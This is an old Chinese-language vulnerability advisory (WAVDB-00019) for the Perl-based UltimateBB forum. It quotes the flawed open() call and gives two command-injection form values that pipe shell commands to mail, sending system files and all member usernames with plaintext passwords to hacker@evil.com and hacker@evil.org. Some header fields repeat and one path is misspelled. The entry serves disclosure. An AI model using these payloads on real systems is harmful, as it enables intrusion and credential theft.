UltimateBB安全漏洞
添加时间:
2005-08-11
系统编号:
WAVDB-00019
影响版本:
UltimateBB
程序介绍:
2005-08-11
系统编号:
WAVDB-00019
影响版本:
UltimateBB
程序介绍:
UltimateBB是基于Perl的在线BBS系统。
漏洞分析:
该BBS被发现存在安全漏洞,允许远程攻击者获取该Perl脚本能访问的任何文件,如/et/cpasswd,UltimateBBS的用户名/口令等。
漏洞利用:
UltimateBB中有如下代码:
# ubb_library.pl:901-902
if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
open (MESSAGE, $ForumsPath/Forum$number/$ThreadFile );
因此只要提交如下表单:
topic=
012345.ubb|mail hacker@evil.com
就能获得/etc/passwd文件。而如下表单:
topic=
012345.ubb|cat Members/*|mail hacker@evil.org|
会显示该BBS的所有用户名和明文口令。